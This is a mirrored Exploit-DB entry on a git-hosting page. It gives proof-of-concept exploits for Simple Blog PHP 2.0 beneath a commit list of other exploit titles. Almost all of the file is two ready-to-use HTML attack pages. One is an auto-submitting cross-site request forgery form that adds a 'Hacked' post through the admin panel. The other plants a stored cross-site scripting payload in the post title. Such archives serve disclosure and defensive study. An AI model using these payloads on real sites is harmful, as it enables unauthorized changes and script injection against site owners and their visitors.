bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/40518.txt
Offensive Security f49abcf00f DB: 2016-10-14 
13 new exploits

Linux Kernel 4.6.3 - Netfilter Privilege Escalation (Metasploit)
Linux Kernel 4.6.3 - 'Netfilter' Privilege Escalation (Metasploit)
ASLDRService ATK Hotkey 1.0.69.0 - Unquoted Service Path Privilege Escalation
Thatware 0.4.6 - SQL Injection
InsOnSrv Asus InstantOn 2.3.1.1 - Unquoted Service Path Privilege Escalation
Simple Blog PHP 2.0 - Multiple Vulnerabilities
Simple Blog PHP 2.0 - SQL Injection

Linux Kernel (Ubuntu 14.04.3) - perf_event_open() Can Race with execve() (Access /etc/shadow)
Linux Kernel (Ubuntu 14.04.3) - 'perf_event_open()' Can Race with execve() (Access /etc/shadow)

Simple PHP Blog 0.8.4 - (Add Admin) Cross-Site Request Forgery
Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add Admin)

miniblog 1.0.1 - (Add New Post) Cross-Site Request Forgery
miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)

PHP Press Release - (Add Admin) Cross-Site Request Forgery
PHP Press Release - Cross-Site Request Forgery (Add Admin)
Maian Weblog 4.0 - (Add New Post) Cross-Site Request Forgery
Spacemarc News - (Add New Post) Cross-Site Request Forgery
Maian Weblog 4.0 - Cross-Site Request Forgery (Add New Post)
Spacemarc News - Cross-Site Request Forgery (Add New Post)
BirdBlog 1.4.0 - (Add New Post) Cross-Site Request Forgery
phpEnter 4.2.7 - (Add New Post) Cross-Site Request Forgery
BirdBlog 1.4.0 - Cross-Site Request Forgery (Add New Post)
phpEnter 4.2.7 - Cross-Site Request Forgery (Add New Post)

ApPHP MicroBlog 1.0.2 - (Add New Author) Cross-Site Request Forgery
ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author)

ApPHP MicroCMS 3.9.5 - (Add Admin) Cross-Site Request Forgery
ApPHP MicroCMS 3.9.5 - Cross-Site Request Forgery (Add Admin)
ATKGFNEXSrv ATKGFNEX 1.0.11.1 - Unquoted Service Path Privilege Escalation
VOX Music Player 2.8.8 - '.pls' Denial of Service
IObit Malware Fighter 4.3.1 - Unquoted Service Path Privilege Escalation
Colorful Blog - Stored Cross Site Scripting
Colorful Blog - Cross-Site Request Forgery (Change Admin Password)
Hotspot Shield 6.0.3 - Unquoted Service Path Privilege Escalation
RSS News AutoPilot Script 1.0.1 / 3.1.0 - Admin Panel Authentication Bypass
JonhCMS 4.5.1 - SQL Injection
2016-10-14 05:01:16 +00:00

50 lines
1.8 KiB
Text
Executable file
Raw Blame History

=====================================================
# Simple Blog PHP 2.0 - CSRF(Add Post) // Stored XSS
=====================================================
# Vendor Homepage: http://simpleblogphp.com/
# Date: 13 Oct 2016
# Demo Link : http://simpleblogphp.com/blog/admin.php
# Version : 2.0
# Platform : PHP
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
=====================================================
# CSRF PoC(Add Post):
<html>
<!-- CSRF PoC -->
<body>
<form action="http://localhost/blog/admin.php" method="POST">
<input type="hidden" name="act" value="addPost" />
<input type="hidden" name="publish_date" value="2016-10-13 10:30:27" />
<input type="hidden" name="post_title" value="Hacked" />
<input type="hidden" name="post_text" value="Hacked" />
<input type="hidden" name="post_limit" value="550" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
# Stored XSS PoC:
<html>
<!-- CSRF + XSS Stored PoC -->
<body>
<form action="http://localhost/blog/admin.php" method="POST">
<input type="hidden" name="act" value="addPost" />
<input type="hidden" name="publish_date" value="2016-10-13 10:30:27" />
<input type="hidden" name="post_title" value="<script>alert('XssPoC')</script>" />
<input type="hidden" name="post_text" value="Hacked" />
<input type="hidden" name="post_limit" value="550" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
================================================================================
# Discovered By : Ehsan Hosseini
================================================================================
Reference in a new issue View git blame Copy permalink